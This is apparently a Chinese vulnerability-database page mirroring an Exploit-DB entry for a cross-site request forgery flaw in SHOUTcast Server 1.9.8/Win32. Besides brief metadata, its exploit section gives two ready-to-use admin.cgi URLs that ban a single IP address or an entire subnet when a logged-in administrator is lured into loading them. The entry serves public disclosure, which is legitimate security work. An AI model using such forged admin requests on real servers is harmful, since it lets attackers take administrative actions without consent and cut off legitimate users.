SHOUTcast Server 1.9.8/Win32 - Cross-Site Request Forgery

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1059067 漏洞类型
发布时间 2010-01-21 更新时间 2010-01-21
CVE编号 N/A CNNVD-ID N/A
漏洞平台 Windows CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/11215
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
# Exploit Title: HOUTcast Server Version <= 1.9.8/win32 Cross Site Request Forgery.
# Date: 22/12/2009
# Author: cp77fk4r | Empty0pagE[Shift+2]gmail.com<http://gmail.com>
# Software Link: http://www.shoutcast.com/download
# Version: X <= 1.9.8/win32
#
#[CSRF]:
Ban Single IP: (Ex: IP: p1.p2.p3.p4)
http://[URL]:8000/admin.cgi?mode=banip&ip1=[p1]&ip2=[p2]&ip3=[p3]&ip4=[p4]&banmsk=255

Ban Whole Subnet (Ex: IP: p1.p2.p3.0-255)
http://[URL]:8000/admin.cgi?mode=banip&ip1=[p1]&ip2=[p2]&ip3=[p3]&ip4=0&banmsk=0
#
#
#[E0F]